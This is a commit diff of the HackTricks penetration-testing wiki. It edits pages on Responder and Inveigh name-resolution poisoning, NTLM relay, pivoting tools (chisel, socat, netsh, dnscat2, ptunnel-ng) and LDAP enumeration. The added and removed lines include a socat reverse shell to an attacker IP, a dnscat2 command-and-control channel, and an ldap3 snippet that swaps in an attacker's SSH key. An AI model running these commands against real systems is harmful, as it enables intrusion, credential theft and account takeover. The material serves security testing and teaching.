mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
GitBook: [#3560] No subject
This commit is contained in:
parent
714393c0a0
commit
1b08cbcba9
17 changed files with 404 additions and 450 deletions
|
@ -196,6 +196,8 @@
|
|||
* [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)
|
||||
* [Skeleton Key](windows-hardening/active-directory-methodology/skeleton-key.md)
|
||||
* [Unconstrained Delegation](windows-hardening/active-directory-methodology/unconstrained-delegation.md)
|
||||
* [Windows Security Controls](windows-hardening/authentication-credentials-uac-and-efs.md)
|
||||
* [UAC - User Account Control](windows-hardening/windows-security-controls/uac-user-account-control.md)
|
||||
* [NTLM](windows-hardening/ntlm/README.md)
|
||||
* [Places to steal NTLM creds](windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
|
||||
* [Lateral Movement](windows-hardening/lateral-movement/README.md)
|
||||
|
@ -205,8 +207,6 @@
|
|||
* [SmbExec/ScExec](windows-hardening/ntlm/smbexec.md)
|
||||
* [WinRM](windows-hardening/ntlm/winrm.md)
|
||||
* [WmicExec](windows-hardening/ntlm/wmicexec.md)
|
||||
* [Windows Security Controls](windows-hardening/authentication-credentials-uac-and-efs.md)
|
||||
* [UAC - User Account Control](windows-hardening/windows-security-controls/uac-user-account-control.md)
|
||||
* [Stealing Credentials](windows-hardening/stealing-credentials/README.md)
|
||||
* [Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md)
|
||||
* [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md)
|
||||
|
|
|
@ -4,11 +4,15 @@
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -786,10 +790,14 @@ The MBR holds the information on how the logical partitions, containing [file sy
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -39,19 +39,18 @@ Responder automates the WPAD attack—running a proxy and directing clients to a
|
|||
>
|
||||
> The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.
|
||||
|
||||
* [**Responder**](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in **`/etc/responder/Responder.conf` ** (here you can disable rogue servers)
|
||||
* **Responder** will **print hashes out on screen** and **write** it to a **log** file per host located in the `/usr/share/responder/logs` directory. Hashes are saved in the format `(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt`
|
||||
* You can find here Responder for **windows** [here](https://github.com/lgandx/Responder-Windows)
|
||||
* Responder works in **ipv4** & **ipv6**
|
||||
[Responder](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_
|
||||
|
||||
#### Responder Params
|
||||
You can find here Responder for **windows** [here](https://github.com/lgandx/Responder-Windows)
|
||||
|
||||
Responder supports the following options:
|
||||
> Responder works in ipv4 & **ipv6**
|
||||
|
||||
Options are the following :
|
||||
|
||||
```
|
||||
--version show program's version number and exit
|
||||
-h, --help show this help message and exit
|
||||
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
|
||||
--version show program's version number and exit
|
||||
-h, --help show this help message and exit
|
||||
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
|
||||
BROWSER, LLMNR requests without responding.
|
||||
-I eth0, --interface=eth0
|
||||
Network interface to use, you can use 'ALL' as a
|
||||
|
@ -64,55 +63,35 @@ Responder supports the following options:
|
|||
-e 10.0.0.22, --externalip=10.0.0.22
|
||||
Poison all requests with another IP address than
|
||||
Responder's one.
|
||||
-b, --basic Return a Basic HTTP authentication. Default: NTLM
|
||||
-r, --wredir Enable answers for netbios wredir suffix queries.
|
||||
Answering to wredir will likely break stuff on the
|
||||
network. Default: False
|
||||
-d, --DHCP Enable answers for DHCP broadcast requests. This
|
||||
-b, --basic Return a Basic HTTP authentication. Default: NTLM
|
||||
-d, --DHCP Enable answers for DHCP broadcast requests. This
|
||||
option will inject a WPAD server in the DHCP response.
|
||||
Default: False
|
||||
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
|
||||
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
|
||||
response, otherwise a WPAD server will be added.
|
||||
Default: False
|
||||
-w, --wpad Start the WPAD rogue proxy server. Default value is
|
||||
-w, --wpad Start the WPAD rogue proxy server. Default value is
|
||||
False
|
||||
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
|
||||
Upstream HTTP proxy used by the rogue WPAD Proxy for
|
||||
outgoing requests (format: host:port)
|
||||
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
|
||||
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
|
||||
retrieval. This may cause a login prompt. Default:
|
||||
False
|
||||
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
|
||||
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
|
||||
authentication for the proxy. WPAD doesn't need to be
|
||||
ON. This option is highly effective when combined with
|
||||
-r. Default: False
|
||||
--lm Force LM hashing downgrade for Windows XP/2003 and
|
||||
--lm Force LM hashing downgrade for Windows XP/2003 and
|
||||
earlier. Default: False
|
||||
--disable-ess Force ESS downgrade. Default: False
|
||||
-v, --verbose Increase verbosity.
|
||||
--disable-ess Force ESS downgrade. Default: False
|
||||
-v, --verbose Increase verbosity.
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Responder Params</summary>
|
||||
|
||||
* The `-A` flag puts us into **analyze mode**, allowing us to see NBT-NS, BROWSER, and LLMNR requests in the environment without poisoning any responses. 
|
||||
* We must always supply either an interface or an IP. 
|
||||
* `-wf` will start the WPAD rogue proxy server
|
||||
* `-f` will attempt to fingerprint the remote host operating system and version
|
||||
* Use the `-v` flag for increased verbosity (a lot of additional data printed to the console)
|
||||
* Options such as `-F` and `-P` can be used to force NTLM or Basic authentication and force proxy authentication, but may cause a login prompt, so they should be used sparingly. 
|
||||
* The `-w` flag utilizes the built-in WPAD proxy server. This can be highly effective, especially in large organizations, because it will capture all HTTP requests by any users that launch Internet Explorer if the browser has [Auto-detect settings](https://docs.microsoft.com/en-us/internet-explorer/ie11-deploy-guide/auto-detect-settings-for-ie11) enabled.
|
||||
|
||||
</details>
|
||||
|
||||
#### Running Responder
|
||||
|
||||
To run default Responder behaviour you only have to execute:
|
||||
|
||||
```bash
|
||||
responder -I <Iface> #Default conf
|
||||
responder -I <Iface> -P -r -v #More chances but might break things
|
||||
responder -I <Iface> -Pv
|
||||
```
|
||||
|
||||
An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows-hardening/ntlm/#ntlmv1-attack)**.**
|
||||
|
@ -138,7 +117,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s
|
|||
|
||||
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
|
||||
|
||||
#### Responder - DHCP Poisoning
|
||||
### DHCP Poisoning
|
||||
|
||||
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
|
||||
|
||||
|
@ -152,7 +131,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier
|
|||
./Responder.py -I eth0 -Pdv
|
||||
```
|
||||
|
||||
#### Responder - Capturing credentials
|
||||
### Capturing credentials
|
||||
|
||||
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
|
||||
|
||||
|
@ -164,23 +143,11 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
|
|||
|
||||
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
|
||||
|
||||
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder. There is a [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) **** that lists all parameters and usage instructions.\
|
||||
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\
|
||||
Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero).
|
||||
|
||||
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
|
||||
|
||||
Or run it with more options:
|
||||
|
||||
```powershell
|
||||
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
|
||||
```
|
||||
|
||||
Or run the C# version:
|
||||
|
||||
```bash
|
||||
Inveigh.exe
|
||||
```
|
||||
|
||||
## NTML Relay Attack
|
||||
|
||||
This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
|
||||
|
|
|
@ -202,6 +202,22 @@ rportfwd_local [bind port] [forward host] [forward port]
|
|||
rportfwd_local stop [bind port]
|
||||
```
|
||||
|
||||
## Windows netsh
|
||||
|
||||
### Port2Port
|
||||
|
||||
You need to be a local admin (for any port)
|
||||
|
||||
```bash
|
||||
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
|
||||
# Example:
|
||||
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
|
||||
# Check the port forward was created:
|
||||
netsh interface portproxy show v4tov4
|
||||
# Delete port forward
|
||||
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
|
||||
```
|
||||
|
||||
## reGeorg
|
||||
|
||||
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
|
||||
|
@ -220,19 +236,16 @@ You need to use the **same version for client and server**
|
|||
### socks
|
||||
|
||||
```bash
|
||||
./chisel server -p 8080 --reverse #Server -- Attacker
|
||||
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
|
||||
./chisel server -p 8080 --reverse #Server
|
||||
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client
|
||||
#And now you can use proxychains with port 1080 (default)
|
||||
|
||||
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
|
||||
./chisel client -v 10.10.10.10:8080 socks #Attacker
|
||||
```
|
||||
|
||||
### Port forwarding
|
||||
|
||||
```bash
|
||||
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
|
||||
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
|
||||
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
|
||||
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
|
||||
```
|
||||
|
||||
## Rpivot
|
||||
|
@ -268,7 +281,7 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
|
|||
|
||||
```bash
|
||||
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337
|
||||
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
||||
```
|
||||
|
||||
### Reverse shell
|
||||
|
@ -281,13 +294,13 @@ victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
|
|||
### Port2Port
|
||||
|
||||
```bash
|
||||
socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>:<rport> &
|
||||
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
|
||||
```
|
||||
|
||||
### Port2Port through socks
|
||||
|
||||
```bash
|
||||
socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
|
||||
socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
|
||||
```
|
||||
|
||||
### Meterpreter through SSL Socat
|
||||
|
@ -351,53 +364,6 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
|
|||
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
|
||||
```
|
||||
|
||||
## Windows netsh
|
||||
|
||||
### Port2Port
|
||||
|
||||
You need to be a local admin (for any port)
|
||||
|
||||
```bash
|
||||
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
|
||||
# Example:
|
||||
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
|
||||
# Check the port forward was created:
|
||||
netsh interface portproxy show v4tov4
|
||||
# Delete port forward
|
||||
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
|
||||
```
|
||||
|
||||
## SocksOverRDP & Proxifier
|
||||
|
||||
You need to have **RDP access over the system**.\
|
||||
Download:
|
||||
|
||||
1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**.
|
||||
2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
|
||||
|
||||
In your client computer load **`SocksOverRDP-Plugin.dll`** like this:
|
||||
|
||||
```bash
|
||||
# Load SocksOverRDP.dll using regsvr32.exe
|
||||
C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
|
||||
```
|
||||
|
||||
Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**.
|
||||
|
||||
**Connect** via **RDP** and upload & execute in the victim machine the **`SocksOverRDP-Server.exe` ** binary:
|
||||
|
||||
```
|
||||
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
|
||||
```
|
||||
|
||||
Now, confirm in you machine (attacker) that the port 1080 is listening:
|
||||
|
||||
```
|
||||
netstat -antb | findstr 1080
|
||||
```
|
||||
|
||||
Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.**
|
||||
|
||||
## Proxify Windows GUI Apps
|
||||
|
||||
You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
|
||||
|
@ -457,29 +423,14 @@ ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
|
|||
|
||||
### DNSCat2
|
||||
|
||||
****[**Download it from here**](https://github.com/iagox86/dnscat2)**.**
|
||||
|
||||
Establishes a C\&C channel through DNS. It doesn't need root privileges.
|
||||
|
||||
```bash
|
||||
attacker> ruby ./dnscat2.rb tunneldomain.com
|
||||
victim> ./dnscat2 tunneldomain.com
|
||||
|
||||
# If using it in an internal network for a CTF:
|
||||
attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache
|
||||
victim> ./dnscat2 --dns host=10.10.10.10,port=5353
|
||||
```
|
||||
|
||||
#### **In PowerShell**
|
||||
|
||||
You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell:
|
||||
|
||||
```
|
||||
Import-Module .\dnscat2.ps1
|
||||
Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd
|
||||
```
|
||||
|
||||
#### **Port forwarding with dnscat**
|
||||
**Port forwarding with dnscat**
|
||||
|
||||
```bash
|
||||
session -i <sessions_id>
|
||||
|
@ -509,28 +460,11 @@ Root is needed in both systems to create tun adapters and tunnel data between th
|
|||
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
|
||||
```
|
||||
|
||||
### ptunnel-ng
|
||||
|
||||
****[**Download it from here**](https://github.com/utoni/ptunnel-ng.git).
|
||||
|
||||
```bash
|
||||
# Generate it
|
||||
sudo ./autogen.sh
|
||||
|
||||
# Server -- victim (needs to be able to receive ICMP)
|
||||
sudo ptunnel-ng
|
||||
# Client - Attacker
|
||||
sudo ptunnel-ng -p <server_ip> -l <listen_port> -r <dest_ip> -R <dest_port>
|
||||
# Try to connect with SSH through ICMP tunnel
|
||||
ssh -p 2222 -l user 127.0.0.1
|
||||
# Create a socks proxy through the SSH connection through the ICMP tunnel
|
||||
ssh -D 9050 -p 2222 -l user 127.0.0.1
|
||||
```
|
||||
|
||||
## Other tools to check
|
||||
|
||||
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
|
||||
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
|
||||
* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -74,74 +74,9 @@ phone: 23627387495
|
|||
* Lines 10-16 define 2 organizational units: dev and sales
|
||||
* Lines 18-26 create an object of the domain and assign attributes with values
|
||||
|
||||
## Write data
|
||||
## Basic Enumeration
|
||||
|
||||
Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**.
|
||||
|
||||
```bash
|
||||
>>> import ldap3
|
||||
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
|
||||
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
|
||||
>>> connection.bind()
|
||||
True
|
||||
>>> connection.extend.standard.who_am_i()
|
||||
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
|
||||
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
|
||||
```
|
||||
|
||||
Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
|
||||
|
||||
## Sniff clear text credentials
|
||||
|
||||
If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
|
||||
|
||||
Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login.
|
||||
|
||||
**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
|
||||
|
||||
## Anonymous Access
|
||||
|
||||
### Bypass TLS SNI check
|
||||
|
||||
According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:
|
||||
|
||||
```bash
|
||||
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
|
||||
```
|
||||
|
||||
### LDAP anonymous binds
|
||||
|
||||
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests. \
|
||||
However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.
|
||||
|
||||
## Valid Credentials
|
||||
|
||||
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
|
||||
|
||||
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
|
||||
|
||||
```bash
|
||||
pip3 install ldapdomaindump
|
||||
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
|
||||
```
|
||||
|
||||
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Automated
|
||||
|
||||
Using this you will be able to see the **public information** (like the domain name)**:**
|
||||
|
||||
```bash
|
||||
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
|
||||
```
|
||||
|
||||
### Python
|
||||
|
||||
<details>
|
||||
|
||||
<summary>See LDAP enumeration with python</summary>
|
||||
### Manual
|
||||
|
||||
You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3`
|
||||
|
||||
|
@ -182,26 +117,63 @@ True
|
|||
>>> connection.entries
|
||||
```
|
||||
|
||||
</details>
|
||||
### Automated
|
||||
|
||||
### windapsearch
|
||||
|
||||
[**Windapsearch**](https://github.com/ropnop/windapsearch) **** is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries.
|
||||
Using this you will be able to see the **public information** (like the domain name)**:**
|
||||
|
||||
```bash
|
||||
# Get computers
|
||||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
|
||||
# Get groups
|
||||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
|
||||
# Get users
|
||||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
|
||||
# Get Domain Admins
|
||||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
|
||||
# Get Privileged Users
|
||||
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
|
||||
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
|
||||
```
|
||||
|
||||
### ldapsearch
|
||||
## Write data
|
||||
|
||||
Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**.
|
||||
|
||||
```bash
|
||||
>>> import ldap3
|
||||
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
|
||||
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
|
||||
>>> connection.bind()
|
||||
True
|
||||
>>> connection.extend.standard.who_am_i()
|
||||
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
|
||||
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
|
||||
```
|
||||
|
||||
Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
|
||||
|
||||
## Clear text credentials
|
||||
|
||||
If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
|
||||
|
||||
Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login.
|
||||
|
||||
**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
|
||||
|
||||
## Bypass TLS SNI check
|
||||
|
||||
